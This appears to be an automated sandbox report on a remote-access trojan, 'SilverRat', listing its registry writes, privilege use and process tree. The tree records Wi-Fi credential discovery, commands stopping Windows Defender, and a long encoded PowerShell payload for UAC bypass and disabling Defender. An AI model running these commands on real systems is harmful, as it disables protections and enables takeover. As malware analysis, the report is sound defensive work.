Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	SilverRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	SilverRat.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4028	7zFM.exe
5044	SilverClient.exe
2452	SilverRat.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeRestorePrivilege	4028	7zFM.exe
Token: 35	4028	7zFM.exe
Token: SeSecurityPrivilege	4028	7zFM.exe
Token: SeSecurityPrivilege	4028	7zFM.exe
Token: SeDebugPrivilege	2452	SilverRat.exe
Token: SeDebugPrivilege	5044	SilverClient.exe
Token: SeDebugPrivilege	2132	whoami.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	816	whoami.exe
Token: SeDebugPrivilege	5608	powershell.exe
Token: SeDebugPrivilege	4744	whoami.exe
Token: SeDebugPrivilege	4744	whoami.exe
Token: SeDebugPrivilege	4744	whoami.exe
Token: SeDebugPrivilege	4744	whoami.exe
Token: SeDebugPrivilege	4744	whoami.exe
Token: SeDebugPrivilege	4744	whoami.exe
Token: SeDebugPrivilege	4744	whoami.exe
Token: SeDebugPrivilege	4744	whoami.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4028	7zFM.exe
4028	7zFM.exe
4028	7zFM.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
5044	SilverClient.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2452 wrote to memory of 5988	2452	SilverRat.exe	87
PID 2452 wrote to memory of 5988	2452	SilverRat.exe	87
PID 2452 wrote to memory of 5988	2452	SilverRat.exe	87
PID 5988 wrote to memory of 1708	5988	csc.exe	89
PID 5988 wrote to memory of 1708	5988	csc.exe	89
PID 5988 wrote to memory of 1708	5988	csc.exe	89
PID 2452 wrote to memory of 5464	2452	SilverRat.exe	90
PID 2452 wrote to memory of 5464	2452	SilverRat.exe	90
PID 2452 wrote to memory of 5464	2452	SilverRat.exe	90
PID 2452 wrote to memory of 3312	2452	SilverRat.exe	92
PID 2452 wrote to memory of 3312	2452	SilverRat.exe	92
PID 2452 wrote to memory of 3312	2452	SilverRat.exe	92
PID 3312 wrote to memory of 2052	3312	csc.exe	94
PID 3312 wrote to memory of 2052	3312	csc.exe	94
PID 3312 wrote to memory of 2052	3312	csc.exe	94
PID 2452 wrote to memory of 2264	2452	SilverRat.exe	96
PID 2452 wrote to memory of 2264	2452	SilverRat.exe	96
PID 2452 wrote to memory of 2264	2452	SilverRat.exe	96
PID 2264 wrote to memory of 2044	2264	csc.exe	98
PID 2264 wrote to memory of 2044	2264	csc.exe	98
PID 2264 wrote to memory of 2044	2264	csc.exe	98
PID 5044 wrote to memory of 4036	5044	SilverClient.exe	103
PID 5044 wrote to memory of 4036	5044	SilverClient.exe	103
PID 4036 wrote to memory of 2132	4036	Cmd.exe	105
PID 4036 wrote to memory of 2132	4036	Cmd.exe	105
PID 4036 wrote to memory of 1120	4036	Cmd.exe	106
PID 4036 wrote to memory of 1120	4036	Cmd.exe	106
PID 4036 wrote to memory of 2456	4036	Cmd.exe	107
PID 4036 wrote to memory of 2456	4036	Cmd.exe	107
PID 2456 wrote to memory of 3404	2456	cmd.exe	108
PID 2456 wrote to memory of 3404	2456	cmd.exe	108
PID 5044 wrote to memory of 4688	5044	SilverClient.exe	114
PID 5044 wrote to memory of 4688	5044	SilverClient.exe	114
PID 5044 wrote to memory of 560	5044	SilverClient.exe	116
PID 5044 wrote to memory of 560	5044	SilverClient.exe	116
PID 560 wrote to memory of 4872	560	powershell.exe	118
PID 560 wrote to memory of 4872	560	powershell.exe	118
PID 560 wrote to memory of 1060	560	powershell.exe	119
PID 560 wrote to memory of 1060	560	powershell.exe	119
PID 560 wrote to memory of 816	560	powershell.exe	121
PID 560 wrote to memory of 816	560	powershell.exe	121
PID 560 wrote to memory of 5616	560	powershell.exe	122
PID 560 wrote to memory of 5616	560	powershell.exe	122
PID 560 wrote to memory of 1316	560	powershell.exe	123
PID 560 wrote to memory of 1316	560	powershell.exe	123
PID 560 wrote to memory of 5608	560	powershell.exe	124
PID 560 wrote to memory of 5608	560	powershell.exe	124
PID 5608 wrote to memory of 3808	5608	powershell.exe	126
PID 5608 wrote to memory of 3808	5608	powershell.exe	126
PID 5608 wrote to memory of 912	5608	powershell.exe	127
PID 5608 wrote to memory of 912	5608	powershell.exe	127
PID 5608 wrote to memory of 4744	5608	powershell.exe	129
PID 5608 wrote to memory of 4744	5608	powershell.exe	129
PID 5608 wrote to memory of 4208	5608	powershell.exe	130
PID 5608 wrote to memory of 4208	5608	powershell.exe	130
PID 5608 wrote to memory of 4388	5608	powershell.exe	131
PID 5608 wrote to memory of 4388	5608	powershell.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender DisableAntiSpyware settings
  - Modifies Windows Defender Real-time Protection settings
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5608
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:3808
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:912
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4744
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    PID:4208
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    PID:4388

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Silver Rat.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4028

C:\Users\Admin\Desktop\SilverRat.exe
"C:\Users\Admin\Desktop\SilverRat.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2452
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bwoqv03i\bwoqv03i.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5988
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9789.tmp" "c:\Users\Admin\Desktop\Resources\CSCB29CEAAD37BF4D099B113F5FDFD20ED.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1708
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h135o1ly\h135o1ly.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5464
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fyrutnv5\fyrutnv5.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3312
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC679.tmp" "c:\Users\Admin\Desktop\Resources\FfAATLCRNqJGAfs\CSCDB6E6F1A809F4C249F941895F55FDCA.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2052
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a05ekvgg\a05ekvgg.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3B5.tmp" "c:\Users\Admin\Desktop\CSC95B6CB12D8B14E4F9EA2D04B83BC5BC0.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2044

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2252

C:\Users\Admin\Desktop\SilverClient.exe
"C:\Users\Admin\Desktop\SilverClient.exe"
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5044
- C:\Windows\SYSTEM32\Cmd.exe
  "Cmd"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4036
- - C:\Windows\system32\whoami.exe
    whoami
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2132
- - C:\Windows\system32\netsh.exe
    netsh wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1120
- - C:\Windows\system32\cmd.exe
    cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3404
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks.exe" /query /TN SilverClient.exe
  2⤵
  PID:4688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQ